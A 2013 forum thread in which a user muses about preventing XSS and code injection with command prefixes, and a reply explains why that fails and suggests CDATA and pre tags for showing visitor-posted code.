Welcome! » Log In » Create A New Profile

XSS against nature

Posted by AvenidaGez 
XSS against nature
March 13, 2013 11:21PM

Having years programing all this about XSS makes me sad day by day It is understandable there is no security at any matter, the car the house, anything someway or another is insecure, but getting up to this levels goes beyond my mind. Of course there are many reasons to protect. From the more difficult aspects I have known is Overflow which is related to most of all to system structure Code injection? Many years ago, I thougt there could be in the engine PHP or whatever, a prefix and/or sufix for all commands, as simple to have in php.ini related to the engine And of course, from manual to php editors handle those pre-sufixes That way there were no problem with any injection, hard to find your assigned prefixes to commands fast code, no need to clean, no need to nothing. Isn't it the same what does Java Pcode, PHP interpreter, javascript or anyother? if is not compiled is interpreted, if is interpreted you have a translation table, then could be prefixes, renames, and sufixes which I don't believe a hacker will take time to find-out For now, I need how to let a visitor let write code in comments (not functional code) with this thing that looks like antivirus which one ends turning off because at the end does not lets you work, I do not find how We need to be secure to some degree, but not living in a self sanitized jail against viruses.

Re: XSS against nature
March 24, 2013 05:21PM

errrr short answer Nope. it's not the same for each. for 1, Javascript is a client-side language, PHP is a server-side language. Sometimes it's not a particular issue with the server script, but could be a flaw in the Browser itself. javascript is a dangerous language to allow untrusted users to use, more so because it's client-side, which means not only can it destroy the integrity of your server, but it can also destroy the integrity of anyone who happens to be viewing a page, they might not even be aware, they don't have to click a link or do anything, simply viewing or opening a page is all it takes where javascript is concerned. same with Java.

But prefixes & suffixes will not prevent XSS at all, just like they don't protect against SQLinjection, hiding the path doesn't help because if you rely on that and somehow someone finds a user form field or URL $_GET/$_REQUEST they can exploit, it doesn't take much to then create a crafty SQL query which will intentionally create an error, which then reveals your DB Prefix and/or path disclosure. you will never be 100% secure, but you should aim to make it as inconvenient as possible.

if you want to let visitors write code in comments, then use pre CDATA that way it won't be parsed, it will just be displayed as is.

Author:
Your Email:

Subject:

HTML input is enabled. Make sure you escape all HTML and angled brackets with < and >.

Auto-paragraphing is enabled. Double newlines will be converted to paragraphs; for single newlines, use the pre tag.

Allowed tags: a, abbr, acronym, b, blockquote, caption, cite, code, dd, del, dfn, div, dl, dt, em, i, ins, kbd, li, ol, p, pre, s, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, var.

For inputting literal code such as HTML and PHP for display, use CDATA tags to auto-escape your angled brackets, and pre to preserve newlines:

<pre><![CDATA[
Place code here
]]></pre>

Power users, you can hide this notice with:

.htmlpurifier-help {display:none;}

Message: